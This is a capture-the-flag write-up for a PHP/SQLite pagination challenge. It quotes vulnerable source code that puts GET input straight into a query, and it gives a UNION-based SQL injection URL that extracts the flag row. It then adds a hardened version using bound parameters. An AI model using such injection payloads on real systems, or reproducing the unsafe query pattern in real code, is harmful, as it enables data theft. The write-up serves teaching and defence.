![image](https://github.com/user-attachments/assets/016151a8-1591-4c27-adda-85a72214e924)

This was just a very simple SQLi challenge.
![image](https://github.com/user-attachments/assets/701ed6e6-1e69-416e-970d-e4d34bd73a82)

Accessing the web page shows this

We can look at the source code
![image](https://github.com/user-attachments/assets/3afda063-1917-442c-b788-087befc789bb)

First we note that it creates a table `pages` with the columns `id`, `title` and `content`:

```php
$db->exec("CREATE TABLE pages (id INTEGER PRIMARY KEY, title TEXT UNIQUE, content TEXT)");
```

Then it inserts the flag as the very first row:

```php
$db->exec("INSERT INTO pages (title, content) VALUES ('Flag', '" . base64_encode($FLAG) . "')");
```

This is how it handles our input

```php
if (isset($_GET['p']) && str_contains($_GET['p'], ",")) {
    // Split the parameter on commas; only the first two pieces are used
    [$min, $max] = explode(",", $_GET['p']);
    // Only $min is checked, and intval() only parses its leading digits
    if (intval($min) <= 1) {
        die("This post is not accessible...");
    }
    try {
        // Both values are interpolated into the SQL string unescaped
        $q = "SELECT * FROM pages WHERE id >= $min AND id <= $max";
        $result = $db->query($q);
        while ($row = $result->fetchArray(SQLITE3_ASSOC)) {
            echo $row['title'] . " (ID=". $row['id'] . ") has content: \"" . $row['content'] . "\"\n";
        }
    } catch (Exception $e) {
        echo "Try harder!";
    }
} else {
    echo "Try harder!";
}
```

It expects the GET parameter `p` to be in the format `int,int`, but it doesn't allow us to set `min` to `1` (or anything lower), which prevents us from accessing the first post directly.

It then uses our input directly in the query, which leads to an SQL injection vulnerability.

I simply just used a `UNION` operator to show the content of the flag
![image](https://github.com/user-attachments/assets/6d595df9-3089-4430-9940-d2b82f21b1d8)

```
http://52.59.124.14:5012/?p=2,1 UNION SELECT * FROM pages WHERE id=1
```

The flag is base64 encoded so just decode it
![image](https://github.com/user-attachments/assets/b253a4c1-ec0a-42d9-992c-dd60befd6348)

```
Flag: ENO{SQL1_W1th_0uT_C0mm4_W0rks_SomeHow!}
```
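
As an added example (not part of the challenge source or the original writeup), here is the same lookup with whole-string integer validation and bound parameters. `fetchPages()`, the sample rows and the placeholder flag value are constructed for illustration.

```php
<?php
// Added example: hardened variant of the handler shown above.
// fetchPages() is a hypothetical helper, not code from the challenge.

function fetchPages(SQLite3 $db, string $p): ?array
{
    // Require exactly two comma-separated fields.
    $parts = explode(',', $p);
    if (count($parts) !== 2) {
        return null;
    }
    // Validate each field as a complete integer >= 2 (id 1 is not accessible).
    // intval() only parses leading digits, and $max was never checked at all.
    $opts = ['options' => ['min_range' => 2]];
    $min = filter_var($parts[0], FILTER_VALIDATE_INT, $opts);
    $max = filter_var($parts[1], FILTER_VALIDATE_INT, $opts);
    if ($min === false || $max === false) {
        return null;
    }
    // Bound parameters are passed as values and never parsed as SQL.
    // The id > 1 restriction is also enforced inside the query itself.
    $stmt = $db->prepare(
        'SELECT id, title, content FROM pages WHERE id >= :min AND id <= :max AND id > 1'
    );
    $stmt->bindValue(':min', $min, SQLITE3_INTEGER);
    $stmt->bindValue(':max', $max, SQLITE3_INTEGER);
    $result = $stmt->execute();
    $rows = [];
    while ($row = $result->fetchArray(SQLITE3_ASSOC)) {
        $rows[] = $row;
    }
    return $rows;
}

// Constructed in-memory database with the same schema as the challenge.
$db = new SQLite3(':memory:');
$db->exec("CREATE TABLE pages (id INTEGER PRIMARY KEY, title TEXT UNIQUE, content TEXT)");
$db->exec("INSERT INTO pages (title, content) VALUES ('Flag', 'PLACEHOLDER_FLAG')");
$db->exec("INSERT INTO pages (title, content) VALUES ('Page 2', 'Hello')");
$db->exec("INSERT INTO pages (title, content) VALUES ('Page 3', 'World')");

// A legitimate range request.
var_dump(fetchPages($db, '2,3'));
// The parameter value from the URL in this writeup.
var_dump(fetchPages($db, '2,1 UNION SELECT * FROM pages WHERE id=1'));
```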

Original writeup (https://github.com/h4ckyou/h4ckyou.github.io/blob/main/posts/ctf/nullcon25/writeup.md#paginator-v2).